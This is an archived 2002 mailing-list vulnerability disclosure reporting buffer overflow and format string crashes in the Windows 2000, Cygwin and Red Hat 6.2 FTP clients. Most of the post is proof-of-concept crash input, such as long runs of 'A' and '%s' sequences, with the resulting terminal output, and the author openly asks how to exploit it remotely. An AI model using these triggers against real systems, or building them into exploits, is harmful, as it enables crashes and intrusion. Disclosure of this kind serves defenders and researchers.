OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: lion (lioncnhonker.net)
Date: Sun May 05 2002 - 13:33:17 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Multiple vuln-devLocal Vulnerabilities in some FTP Client.

    1. Windows 2000 and other Version FTP Client Overflows and Format String Vulnerability.
    a.
    d:\>perl -e "printf 'A'x3000"|ftp
    Invalid command.
    ftp>

    will see the 0x4141414d memory addr not be read erroor.

    d:\>perl -e "printf 'open '. 'A'x3000"|ftp
    Already connected to (null), use disconnect first.

    will see the 0x4141414d memory addr not be read erroor.

    b.
    d:\>ftp localhost
    Connected to lion.
    220 lion Microsoft FTP Service (Version 5.0).
    User (lion:(none)): ftp
    331 Anonymous access allowed, send identity (e-mail name) as password.
    Password:
    230 Anonymous user logged in.
    ftp> debug
    Debugging On .
    ftp> cd AAAAAAAAAAˇ­ˇ­ ('A' x 500)
    500 Command was too long
    421 Terminating connection.
    Connection closed by remote host.
    ftp> debug
    Debugging On .
    ftp> open localhost
    Connected to lion.
    220 lion Microsoft FTP Service (Version 5.0).
    User (lion:(none)): ftp
    ---> USER ftp
    331 Anonymous access allowed, send identity (e-mail name) as password.
    Password:
    ---> PASS f
    230 Anonymous user logged in.
    ftp> cd AAAAAAAAAAAAAAAAˇ­ˇ­('A'x 2000)

    will see the 0x41414141 memory addr not be read erroor.

    ftp> ls AAAAAAAAAAAAAAAAˇ­ˇ­('A'x 2000)
    ---> PORT 127,0,0,1,4,114
    200 PORT command successful.
    ---> NLST AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAˇ­ˇ­..

    will see the 0x41414141 memory addr not be read erroor.

    c.
    d:\>ftp localhost
    Connected to lion.
    220 lion Microsoft FTP Service (Version 5.0).
    User (lion:(none)): ftp
    331 Anonymous access allowed, send identity (e-mail name) as password.
    Password:
    230 Anonymous user logged in.
    ftp> debug
    Debugging On .
    ftp> quote %s
    ---> quote %s
    500 'QUOTE %s': command not understood
    ftp> quote %s%s%s
    ---> quote %s%s%s?(null)
    500 'QUOTE %s%s%s (null)': command not understood
    ftp> quote %s%s%s%s%s%s%s%s
    --->

    will see the 0x73257325 memory addr not be read erroor.

    Use W32Dasm isamssemble the ftp.exe, we can find the
    780127A8 mov dword ptr [eax],ecx

    This is a character with win2000 Format Strings Vulnerability.

    2. Cygwin version 2.194.2.21 and Redhat 6.2 FTP Client Format String Vulnerability.

    lionLION ~
    $ ftp localhost
    Connected to lion.
    220 lion Microsoft FTP Service (Version 5.0).
    Name (localhost:lion): ftp
    331 Anonymous access allowed, send identity (e-mail name) as password.
    Password:
    230 Anonymous user logged in.
    Remote system type is Windows_NT.
    ftp> debug
    Debugging on (debug=1).
    ftp> quote %s
    ---> %s
    500 '%S': command not understood
    ftp> quote %s%s%s%s%s%s%s
    Segmentation fault (core dumped)

    Who can exploit it by remote?
    Sorry for my poor English.:)

    Lion
    lioncnhonker.net
    HUC